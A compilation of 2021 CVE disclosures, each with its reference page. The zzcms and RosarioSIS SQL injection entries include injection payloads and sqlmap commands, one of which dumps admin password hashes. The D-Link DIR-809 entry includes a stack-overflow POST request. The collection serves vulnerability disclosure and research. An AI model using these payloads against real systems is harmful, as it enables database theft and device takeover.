An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, and 2021 via the id parameter in admin/bad.php.

**ZZCMS2021\_sqlinject\_3****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `/admin/bad.php`

<?php include("admin.php");?>
...
#line 10-41
checkadminisdo("badusermessage");
$action=isset($\_REQUEST\["action"\])?$\_REQUEST\["action"\]:'';
if ($action<\>""){
	$id="";
	if(!empty($\_POST\['id'\])){
    	for($i=0; $i<count($\_POST\['id'\]);$i++){
    	$id=$id.($\_POST\['id'\]\[$i\].',');
    	}
	$id=substr($id,0,strlen($id)-1);//去除最后面的","
	}

	if ($id==""){
	echo "<script\>alert('操作失败！至少要选中一条信息。');history.back();</script\>";
	}
}
if ($action=="del"){
	 if (strpos($id,",")\>0){
		$sql="delete from zzcms\_bad where id in (". $id .")";
	}else{
		$sql="delete from zzcms\_bad where id='$id'";
	}

query($sql);
echo "<script\>location.href\='bad.php'</script\>";
}
if ($action=="lockip"){
	 if (strpos($id,",")\>0){
		$sql="update  zzcms\_bad set lockip=1 where id in (". $id .")";
	}else{
		$sql="update  zzcms\_bad set lockip=1 where id='$id'";
	}
query($sql);

**Before you exploit this vulnerability, you need to find a way to obtain the permission of background administrator**

After you obtain the administrator user rights and log in, visit the following link to exploit the vulnerability:

http://yourhost/admin/bad.php

POC:

    POST /admin/bad.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 69
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/admin/bad.php
    Cookie: askbigclassid=0; asksmallclassid=0; __tins__713776=%7B%22sid%22%3A%201629992898141%2C%20%22vd%22%3A%206%2C%20%22expires%22%3A%201629995107025%7D; __51cke__=; __51laig__=20; bdshare_firstime=1629951198125; PHPSESSID=a5tlfr6q1ete0aaa6dq5pppi43; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    action=del&id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
    

**You can change the post parameter action to del or lockip**

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827011634912.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/admin/bad.php" --cookie="admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;" --method POST --data "action=del&id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --flush-session --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827012018026.png

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/dl/dl\_print.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827012641294.png

CVE-2021-40279: ZZCMS2021 sqlinject(3)

GL.iNet GL-AR150 2.x before 3.x devices, configured as repeaters, allow cgi-bin/router_cgi?action=scanwifi XSS when an attacker creates an SSID with an XSS payload as the name.

**I accidentally got my 4th CVE.****CVE ID: CVE-2021-44148**

Don't get too excited, it's just an XSS. Just a standard XSS.

I’m about to go full recipe blog:

The story of this CVE begins in 2014 when I first heard of the wifi pineapple from Hak5. At the time, I was working in IT making 30k a year and paying for my ex-wife to go to college. I did not have $100 bucks or whatever it was to drop on a wifi-pineapple. In 2016 I saw blog articles like these:

*   http://sapinski.com/2016/02/13/wifi-pineapple-firmware-for-gl-inet-gl-ar150/
*   https://www.securityaddicted.com/2016/11/17/weaponizing-gl-inet-gl-ar150/
*   https://jerrygamblin.com/2016/04/11/turning-a-25-gl-ar150-into-a-100-wifipineapple/?platform=hootsuite

All claiming you could buy a $25 mini router and turn it into a wifi pineapple. I instantly bought one.

![](https://beaugraham.com/images/order.png)

But because of my 2x diagnosed ADHD/ADD I never even got as far as installing the wifi pineapple firmware. It had taken about a week to get to my house and by that time I had become obsessed with something else.

Fast forward to 2019.

I started working as a pentester in July-ish of 2019. Specifically working on web application pentests. At this time whenever I see something on Twitter or LinkedIn about something web-app pentest or bug bounty related, I read it. I came across this blog post:

https://infosecwriteups.com/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968

Reading this made me realize that literally any input could be an XSS and I thought to myself I may as well make an XSS SSID just in case for the future. I have Ubiquiti equipment at home so it was easy enough to create an SSID called <script>alert(2)</script>. Keep in mind that SSID’s have to be less than 32 characters.

Fast forward to late 2021. The pandemic has been “almost over” for a year now.

People are starting to go back into the office. I can’t really talk about what I was working on but for a pentest I needed a little router. I remembered back when I bought my GL-AR150 in 2016. I had since moved 5 times. In my last move I decided to index everything that was in each box so I found it relatively fast.

I plugged it in and connected to the default network it provided. After setting a root password, I logged in and started navigating around the menus to see if anything would be helpful for my pentest or if I should just install default openwrt.

![alert](https://beaugraham.com/images/alert.png)

Seemingly out of nowhere I get this popup. For about 4 seconds I was like “WUT….” and then it all clicked. I was on the repeater page where it searches for wifi networks. My SSID that I had made in 2019 finally did something.

At this point I just started laughing. I couldn't believe it. My wife thought something was wrong because of the noises that were coming out of my home office.

I didn’t have time to create a real XSS payload like I normally do but I still felt good about finding this one. I decided to take it just one step further using xsshunter.com.

As you remember an SSID can only be 32 characters. So my normal xsshunter payloads weren’t going to work. So instead I followed this blog post and created a short domain that forwarded to my normal xsshunter payload page:

https://medium.com/@mohameddaher/how-i-paid-2-for-1054-xss-bug-20-chars-blind-xss-payloads-12d32760897b

So now I have an SSID that has my xsshunter payload in it just in case this happens again. So now I’ll get notifications:

![](https://beaugraham.com/images/notification.png)

Something else to remember is that this was purchased in 2016. It had an extremely old firmware on it. So when I found this bug it was running on firmware version 2.19 and the bug was fixed in version 3 of the firmware. The current version as of writing is 3.203. More can be found here:

https://docs.gl-inet.com/en/3/release\_notes/

TL;DR:

XSS payload as WiFi SSID leads to reflected XSS.

Timeline:

*   Nov 16th 2021 Found bug
*   Nov 17th 2021 Notified company of bug via email
*   Bug has already been fixed in version 3.x of firmware.
*   Nov 20th submit for CVE
*   Nov 22nd CVE reserved

CVE-2021-44148: Beau Graham

Chamilo LMS v1.11.x was discovered to contain a SQL injection via the doc parameter in main/plagiarism/compilatio/upload.php.

CVE-2021-35414: Security issues - Chamilo LMS

D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function sub_80046EB4 in /formSetPortTr. This vulnerability is triggered via a crafted POST request.

**D-Link DIR809 Vulnerability**

The Vulnerability is in page `/formSetPortTr` which influences the latest version of this router OS.

The firmware version is DIR-809Ax\_FW1.12WWB03\_20190410

**Progress**

*   Confirmed by vendor.

**Vulnerability description**

In the function `sub_80046EB4`( page `/formSetPortTr` ), we find a stack overflow vulnerability, which allows attackers to execute arbitrary code on system via a crafted post request.

Here is the description of the first vulnerability,

1.  The `get_var` function extracts user input from the a http request. For example, the code below will extract the value of a key of format `"inputPortRng_%d"` in the http post request which is completely under the attacker's control.
2.  The string `v25` obtained from user is copied onto the stack using `strcpy` without checking its length. So we can make the stack buffer overflow in `v16`.

![2021-05-13_14h15_00](https://github.com/Lnkvct/IoT-poc/raw/master/D-Link-DIR809/vuln11/README/2021-05-13_14h15_00.png)

    POST /formSetPortTr.htm HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 4210
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.0.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.0.1/Advanced/Special_Applications.asp
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: uid=YF608CCB25
    Connection: close
    
    settingsChanged=1&curTime=1620559041239&HNAP_AUTH=6946CD2354C87A2E9E189EFFB61EECD9+1620559041&submit-url=%2FAdvanced%2FSpecial_Applications.asp&used_0=0&enabled_0=0&entry_name_0=aaa&trigPortRng_0=aa&trigPortPtc_0=6&sched_name_0=aaaaaaaaa&inputPortRng_0=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&inputPortPtc_0=6&used_1=0&enabled_1=0&entry_name_1=&trigPortRng_1=&trigPortPtc_1=6&sched_name_1=Always&inputPortRng_1=&inputPortPtc_1=6&used_2=0&enabled_2=0&entry_name_2=&trigPortRng_2=&trigPortPtc_2=6&sched_name_2=Always&inputPortRng_2=&inputPortPtc_2=6&used_3=0&enabled_3=0&entry_name_3=&trigPortRng_3=&trigPortPtc_3=6&sched_name_3=Always&inputPortRng_3=&inputPortPtc_3=6&used_4=0&enabled_4=0&entry_name_4=&trigPortRng_4=&trigPortPtc_4=6&sched_name_4=Always&inputPortRng_4=&inputPortPtc_4=6&used_5=0&enabled_5=0&entry_name_5=&trigPortRng_5=&trigPortPtc_5=6&sched_name_5=Always&inputPortRng_5=&inputPortPtc_5=6&used_6=0&enabled_6=0&entry_name_6=&trigPortRng_6=&trigPortPtc_6=6&sched_name_6=Always&inputPortRng_6=&inputPortPtc_6=6&used_7=0&enabled_7=0&entry_name_7=&trigPortRng_7=&trigPortPtc_7=6&sched_name_7=Always&inputPortRng_7=&inputPortPtc_7=6&used_8=0&enabled_8=0&entry_name_8=&trigPortRng_8=&trigPortPtc_8=6&sched_name_8=Always&inputPortRng_8=&inputPortPtc_8=6&used_9=0&enabled_9=0&entry_name_9=&trigPortRng_9=&trigPortPtc_9=6&sched_name_9=Always&inputPortRng_9=&inputPortPtc_9=6&used_10=0&enabled_10=0&entry_name_10=&trigPortRng_10=&trigPortPtc_10=6&sched_name_10=Always&inputPortRng_10=&inputPortPtc_10=6&used_11=0&enabled_11=0&entry_name_11=&trigPortRng_11=&trigPortPtc_11=6&sched_name_11=Always&inputPortRng_11=&inputPortPtc_11=6&used_12=0&enabled_12=0&entry_name_12=&trigPortRng_12=&trigPortPtc_12=6&sched_name_12=Always&inputPortRng_12=&inputPortPtc_12=6&used_13=0&enabled_13=0&entry_name_13=&trigPortRng_13=&trigPortPtc_13=6&sched_name_13=Always&inputPortRng_13=&inputPortPtc_13=6&used_14=0&enabled_14=0&entry_name_14=&trigPortRng_14=&trigPortPtc_14=6&sched_name_14=Always&inputPortRng_14=&inputPortPtc_14=6&used_15=0&enabled_15=0&entry_name_15=&trigPortRng_15=&trigPortPtc_15=6&sched_name_15=Always&inputPortRng_15=&inputPortPtc_15=6&used_16=0&enabled_16=0&entry_name_16=&trigPortRng_16=&trigPortPtc_16=6&sched_name_16=Always&inputPortRng_16=&inputPortPtc_16=6&used_17=0&enabled_17=0&entry_name_17=&trigPortRng_17=&trigPortPtc_17=6&sched_name_17=Always&inputPortRng_17=&inputPortPtc_17=6&used_18=0&enabled_18=0&entry_name_18=&trigPortRng_18=&trigPortPtc_18=6&sched_name_18=Always&inputPortRng_18=&inputPortPtc_18=6&used_19=0&enabled_19=0&entry_name_19=&trigPortRng_19=&trigPortPtc_19=6&sched_name_19=Always&inputPortRng_19=&inputPortPtc_19=6&used_20=0&enabled_20=0&entry_name_20=&trigPortRng_20=&trigPortPtc_20=6&sched_name_20=Always&inputPortRng_20=&inputPortPtc_20=6&used_21=0&enabled_21=0&entry_name_21=&trigPortRng_21=&trigPortPtc_21=6&sched_name_21=Always&inputPortRng_21=&inputPortPtc_21=6&used_22=0&enabled_22=0&entry_name_22=&trigPortRng_22=&trigPortPtc_22=6&sched_name_22=Always&inputPortRng_22=&inputPortPtc_22=6&used_23=0&enabled_23=0&entry_name_23=&trigPortRng_23=&trigPortPtc_23=6&sched_name_23=Always&inputPortRng_23=&inputPortPtc_23=6
    

**Acknowledgment**

Credit to @Ainevsia, @peanuts62, @Yu3H0 from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-33271: IoT-poc/D-Link-DIR809/vuln11 at master · Lnkvct/IoT-poc

chamilo-lms v1.11.14 is affected by a Cross Site Scripting (XSS) vulnerability in /plugin/jcapture/applet.php if an attacker passes a message hex2bin in the cookie.

**Chamilo 1.11.x**

![Build Status](https://camo.githubusercontent.com/aea4dedcfeccd389b971dbd8260df22698f6efffd894dfa41ee12029a54d28b1/68747470733a2f2f7472617669732d63692e6f72672f6368616d696c6f2f6368616d696c6f2d6c6d732e7376673f6272616e63683d312e31312e78) ![Scrutinizer Code Quality](https://camo.githubusercontent.com/5c8291b3300e9c54ce9a0ddc20cf6f01a4eab18b7b3795b490d373a3072e1845/68747470733a2f2f7363727574696e697a65722d63692e636f6d2f672f6368616d696c6f2f6368616d696c6f2d6c6d732f6261646765732f7175616c6974792d73636f72652e706e673f623d312e31312e78) ![Code Coverage](https://camo.githubusercontent.com/f57a179067358901bced3e99e3e211a7641cd193d7e7ab373f34425c0b228896/68747470733a2f2f7363727574696e697a65722d63692e636f6d2f672f6368616d696c6f2f6368616d696c6f2d6c6d732f6261646765732f636f7665726167652e706e673f623d312e31312e78) ![Bountysource](https://camo.githubusercontent.com/59eaeb4f05c9ff700681d0fd8ec30cb86a82f1a4c65efbf82ae2978ba71f16e2/68747470733a2f2f7777772e626f756e7479736f757263652e636f6d2f62616467652f7465616d3f7465616d5f69643d3132343339267374796c653d726169736564) ![Code Consistency](https://camo.githubusercontent.com/3bc66755dc2e12f4a374fb26d24ba33881ac3886baf05b5cf431df5b043d70ee/68747470733a2f2f737175697a6c6162732e6769746875622e696f2f5048505f436f6465536e69666665722f616e616c797369732f6368616d696c6f2f6368616d696c6f2d6c6d732f67726164652e737667) ![CII Best Practices](https://camo.githubusercontent.com/cece3b502cea381cfa2f8f9bfdc9bccf8a08d0353bad51e023691d49f32994d2/68747470733a2f2f626573747072616374696365732e636f7265696e6672617374727563747572652e6f72672f70726f6a656374732f3136362f6261646765) ![Codacy Badge](https://camo.githubusercontent.com/2657ea94f3334bacaab31f95ee9e7b8d959c5a0a832c6920bc04ed047b71f493/68747470733a2f2f6170692e636f646163792e636f6d2f70726f6a6563742f62616467652f47726164652f3838653933346161623266333462623761303339376136663632623037386232)

**Installation**

This installation guide is for development environments only.

**Install PHP, a web server and MySQL/MariaDB**

To run Chamilo, you will need at least a web server (we recommend Apache2 for commodity reasons), a database server (we recommend MariaDB but will explain MySQL for commodity reasons) and a PHP interpreter (and a series of libraries for it). If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just type

    sudo apt-get install apache2 mysql-server php libapache2-mod-php php-gd php-intl php-curl php-json php-mysql php-zip composer
    

**Install Git**

The development version 1.11.x requires you to have Git installed. If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just type

**Install Composer**

To run the development version 1.11.x, you need Composer, a libraries dependency management system that will update all the libraries you need for Chamilo to the latest available version.

Make sure you have Composer installed. If you do, you should be able to launch "composer" on the command line and have the inline help of composer show a few subcommands. If you don't, please follow the installation guide at https://getcomposer.org/download/

**Download Chamilo from GitHub**

Clone the repository

    sudo mkdir chamilo-1.11
    sudo chown -R `whoami` chamilo-1.11
    git clone -b 1.11.x --single-branch https://github.com/chamilo/chamilo-lms.git chamilo-1.11
    

Checkout branch 1.11.x

    cd chamilo-1.11
    git checkout --track origin/1.11.x
    git config --global push.default current
    

**Update dependencies using Composer**

From the Chamilo folder (in which you should be now if you followed the previous steps), launch:

If you face issues related to missing JS libraries, you might need to ensure that your web/assets folder is completely re-generated. Use this set of commands to do that:

    rm composer.lock
    rm -rf web/ vendor/
    composer clear-cache
    composer update
    

This will take several minutes in the best case scenario, but should definitely generate the missing files.

**Change permissions**

On a Debian-based system, launch:

    sudo chown -R www-data:www-data app main/default_course_document/images main/lang web
    

**Configure the web server**

Enable the Apache web server module "rewrite" :

    sudo a2enmod rewrite
    sudo systemctl restart apache2.service
    

Chamilo's .htaccess must be obeyed. Create /etc/apache2/conf-available/htaccessForChamilo.conf with these lines :

    <Directory /var/www/html/chamilo-lms>
    	AllowOverride All
    </Directory>
    

then enable it :

    sudo a2enconf htaccessForChamilo
    sudo systemctl reload apache2.service
    

If you just installed missing PHP extensions using apt, you must restart the web server to get them loaded :

    sudo systemctl restart apache2.service
    

**Start the installer**

In your browser, load the Chamilo URL. You should be automatically redirected to the installer. If not, add the "main/install/index.php" suffix manually in your browser address bar. The rest should be a matter of simple OK > Next > OK > Next...

**Upgrade from 1.10.x**

1.11.0 is a major version. It contains a series of new features, that also mean a series of new database changes in regards with versions 1.10.x. As such, it is necessary to go through an upgrade procedure when upgrading from 1.10.x to 1.11.x.

The upgrade procedure is relatively straightforward. If you have a 1.10.x initially installed with Git, here are the steps you should follow (considering you are already inside the Chamilo folder):

    git fetch --all
    git checkout origin 1.11.x
    

Then load the Chamilo URL in your browser, adding "main/install/index.php" and follow the upgrade instructions. Select the "Upgrade from 1.10.x" button to proceed.

If you have previously updated database rows manually, you might face issue with FOREIGN KEYS during the upgrade process. Please make sure your database is consistent before upgrading. This usually means making sure that you have to delete rows from tables referring to rows which have been deleted from the user or access\_url tables. Typically:

    DELETE FROM access\_url\_rel\_course WHERE access\_url\_id NOT IN (SELECT id FROM access\_url);

**Upgrading from non-Git Chamilo 1.10**

In the _very unlikely_ case of upgrading a "normal" Chamilo 1.10 installation (done with the downloadable zip package) to a Git-based installation, make sure you delete the contents of a few folders first. These folders are re-generated later by the `composer update` command. This is likely to increase the downtime of your Chamilo portal of a few additional minutes (plan for 10 minutes on a reasonnable internet connection).

    rm composer.lock
    rm -rf web/*
    rm -rf vendor/*
    

**For developers and testers only**

This section is for developers only (or for people who have a good reason to use a development version of Chamilo), in the sense that other people will not need to update their Chamilo portal as described here.

**Updating code**

To update your code with the latest developments in the 1.11.x branch, go to your Chamilo folder and type:

If you have made customizations to your code before the update, you will have two options:

*   abandon your changes (use "git stash" to do that)
*   commit your changes locally and merge (use "git commit" and then "git pull")

You are supposed to have a reasonable understanding of Git in order to use Chamilo as a developer, so if you feel lost, please check the Git manual first: http://git-scm.com/documentation

**Updating your database from new code**

Since the 2015-05-27, Chamilo offers the possibility to make partial database upgrades through Doctrine migrations.

To update your database to the latest version, go to your Chamilo root folder and type

    php bin/doctrine.php migrations:migrate --configuration=app/config/migrations.yml
    

If you want to proceed with a single migration "step" (the steps reside in src/Chamilo/CoreBundle/Migrations/Schema/V110/), then check the datetime of the version and type the following (assuming you want to execute Version20150527120703)

    php bin/doctrine.php migrations:execute 20150527120703 --up --configuration=app/config/migrations.yml
    

You can also print the differences between your database and what it should be by issuing the following command from the Chamilo base folder:

    php bin/doctrine.php orm:schema-tool:update --dump-sql
    

**Contributing**

If you want to submit new features or patches to Chamilo, please follow the Github contribution guide https://guides.github.com/activities/contributing-to-open-source/ and our CONTRIBUTING.md file. In short, we ask you to send us Pull Requests based on a branch that you create with this purpose into your repository forked from the original Chamilo repository.

**Documentation**

For more information on Chamilo, visit https://1.11.chamilo.org/documentation/index.html

CVE-2021-43687: GitHub - chamilo/chamilo-lms at v1.11.14

Insufficient Input Validation in Web Applications operating on Business-DNA Solutions GmbH’s TopEase® Platform Version <= 7.1.27 allows an authenticated remote attacker with Object Modification privileges to insert arbitrary HTML without code execution.

CVE-2021-42117: Release Notes - TopEase Documentation

An insufficient session expiration vulnerability exists in Business-DNA Solutions GmbH’s TopEase® Platform Version <= 7.1.27, which allows a remote attacker to reuse, spoof, or steal other user and admin sessions.

CVE-2021-42545: Release Notes - TopEase Documentation

An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) before 8.1.1 allows remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.

**Description**

Unauthenticated SQL Injection vulnerability in Rosario Student Information System version 8.1 allows remote attackers to execute PostgreSQL statements (e.g.: SELECT, INSERT, UPDATE, DELETE) through _**/Side.php**_ via _**syear**_ parameter.

This vulnerability is a result of two issues:

*   **OWASP Top 10:2021 - A01:2021 – Broken Access Control**
*   **OWASP Top 10:2021 - A03:2021 – Injection**

**Plugin**

**README**

Vulnerability Type:

SQL Injection (SQLi)

Vendor of the product(s):

RosarioSIS

Affected product(s)/code base:

8.1

Has vendor confirmed or acknowledged the vulnerability:

Yes

Attack type:

Unauthenticated

Impact & Description:

C:H/I:H/A:H

Affected Component:

/Side.php, /Warehouse.php, /functions/Current.php, /functions/GetMP.php

Attack vector(s):

Remote

Proof of concept (PoC):

Details below

References:

Issue #328 (closed)

Severity:

Critical (9.8)

CVSS v3.1 Vector String:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Initial Communication**

Hi @francoisjacquet,

Found two issues in the latest version of RosarioSIS (version 8.1).

Many thanks & hope this helps!

– IJ

**Environment Details**

*   **RosarioSIS 8.1**
*   **PHP 7.4.21**
*   **PostgreSQL 13.3**

**Proof-of-Concept**

The following command can be used to replicate this finding

    sqlmap -u "http://hostname/path/Side.php" --data="sidefunc=update&syear=111" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" --delay=0 --timeout=30 --retries=0 -p "syear" --dbms="PostgreSQL" --technique BET --level=5 --risk=3 --threads=1 --time-sec=5 -b --current-user --current-db --dbs --answers="crack=N,dict=N,continue=Y,quit=N" -v 0 --drop-set-cookie --flush-session

![image](https://gitlab.com/uploads/855eff680e104d100ff7cd7fea4fde64/image.png)

**Recommendations******OWASP Top 10:2021 - A01:2021 – Broken Access Control****

*   Create a session handler which will be imported on all PHP files of RosarioSIS
*   Always check if the current session is authenticated or not & handle execution flow accordingly
*   Avoid exposing conditional statements which directly accept user-supplied input
*   Wrap code with intended functionality within declared functions
*   Prevent unauthenticated users from directly supplying input & controlling execution flow

****OWASP Top 10:2021 - A03:2021 – Injection****

*   Do not trust user-supplied input, always perform validation at the back-end / server-side
*   Create a whitelist at the back-end to filter out malicious characters from user-supplied input
    *   Example: When expecting string input (e.g.: First Name, Last Name) from the user
        *   Filter against \[a-zA-Z0-9\]\* (and some symbols if necessary - @, ., etc)
        *   Drop or ignore all else - dangerous characters from user-supplied input (e.g.: <, >, , ', ", \`, $, %, !, ?, -, +, \_, #, \[, \], (, ), etc)
*   Ensure proper data type handling is observed
    *   Example: When expecting an integer (e.g.: sYear) from the user
        *   Accept string input -> Sanitize input -> Check if input is valid integer -> SQL query
*   For SQL, make use of parameterized queries, prepared statements & stored procedures after sanitizing user-supplied input

**References**

*   https://owasp.org/Top10/A01\_2021-Broken\_Access\_Control/
*   https://owasp.org/Top10/A07\_2021-Identification\_and\_Authentication\_Failures/
*   https://owasp.org/Top10/A03\_2021-Injection/
*   https://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php
*   https://stackoverflow.com/questions/4712037/what-is-parameterized-query
*   https://www.php.net/manual/en/pdo.prepared-statements.php
*   https://security.stackexchange.com/questions/32334/what-dangerous-characters-need-to-be-filtered-from-user-input-prior-to-use-in-a

**Analysis**

During the analysis, breakpoints were set in Visual Studio Code for the following files

*   At _**/Side.php**_ on the following lines:
    *   10, 25, 56, 59, 452
*   At _**functions/GetMP.php**_ on the following line:
    *   406

**A01:2021 – Broken Access Control**

The file _**/Side.php**_ (and other php files in RosarioSIS) does not implement access controls or session management checks to prevent any unauthenticated user from executing its code by directly accessing it through a browser.

Since no session management checks are implemented, visiting _**/Side.php**_ through a browser causes _**lines 85 - 90**_ of _**/Warehouse.php**_ to be executed from _**line 10**_ of _**/Side.php**_ - which is a code snippet that loads php files within the _**functions/**_ directory of the web server:

_**Lines 1 - 19 of /Side.php (emphasis on line 10)**_

         1  <?php
         2  /**
         3   * Side
         4   *
         5   * Side menu
         6   *
         7   * @package RosarioSIS
         8   */
         9
        10  require_once 'Warehouse.php';
        11
        12  $old_school = UserSchool();
        13  $old_syear = UserSyear();
        14  $old_period = UserCoursePeriod();
        15
        16  $unset_student = $unset_staff = $update_body = false;
        17
        18  $addJavascripts = '';
        19

_**Lines 82 - 90 of /Warehouse.php**_

        82  /**
        83   * Load functions
        84   */
        85  $functions = glob( 'functions/*.php' );
        86
        87  foreach ( $functions as $function )
        88  {
        89          require_once $function;
        90  }

_**Import of _functions/GetMP.php_ from _/Side.php_**_

![image](https://gitlab.com/uploads/c16af81f08958786a9bedcdada8700c0/image.png)

Since the conditional _**if statement**_ on _**lines 25 - 30**_ _(boxed in red below)_ checks for user-controlled parameters ($\_REQUEST, $\_POST), an unauthenticated user could craft & supply a request which will pass the conditional check and ultimately control the application's execution flow.

![image](https://gitlab.com/uploads/d886006c8c0055a41f5921f03198ff3f/image.png)

This can be done by sending a request that:

*   Contains a parameter "sidefunc=update"
*   Is an HTTP POST request

    POST /rosariosis-v8.1/Side.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
    Host: 192.168.254.140
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 117
    
    
    sidefunc=update&syear=111'+OR+(SELECT(SELECT+CASE+WHEN+(SUBSTRING('poc',2,1)=CHR(ASCII('o')))+THEN+1+ELSE+0+END)=1)--

After passing the first conditional check, another series of conditional _**if statements**_ beginning at _**line 35**_ (pointed with a red arrow in the image above) will be executed.

However, since the condition in _**line 35**_ is not met, execution will continue to the following _**else if statement**_ at _**line 53**_ which leads to the SQL Injection vulnerability.

![image](https://gitlab.com/uploads/578a6b593f07ea5055975e4fae1586c0/image.png)

**A03:2021 – Injection**

The value of HTTP POST parameter _**syear**_ is assigned to the HTTP SESSION parameter _**UserSyear**_ at _**line 56**_ which is then passed on to _**line 59**_ where the _**GetCurrentMP()**_ function is called with the _**DBDate()**_ argument.

![image](https://gitlab.com/uploads/380b67f92f7a4bee3d692f835b2dab9c/image.png)

![image](https://gitlab.com/uploads/e75147233e86864878f0a1ea8ebcd15c/image.png)

Stepping into from _**line 59**_ leads to the function definition of _**DBDate()**_ at _**line 32**_ of _**functions/Date.php**_ which returns the current date in ISO format (e.g. 2021-09-25). This value is passed on to GetCurrentMP() as its 2nd argument.

![image](https://gitlab.com/uploads/c8b94652b0ca67ded1c51afa558d0417/image.png)

Stepping into from _**line 32**_ of _**functions/Date.php**_ leads to the function definition of _**GetCurrentMP()**_ which starts at _**line 404**_ of _**functions/GetMP.php**_

![image](https://gitlab.com/uploads/3575b52356eb97655e677b37234da249/image.png)

A SQL query is defined in _**lines 411 - 416**_ where it is assigning to the SQL query parameter _**SYEAR**_ the returned value of the function call to _**UserSyear()**_

![image](https://gitlab.com/uploads/580c7a50cf15b64b52eecbf440812465/image.png)

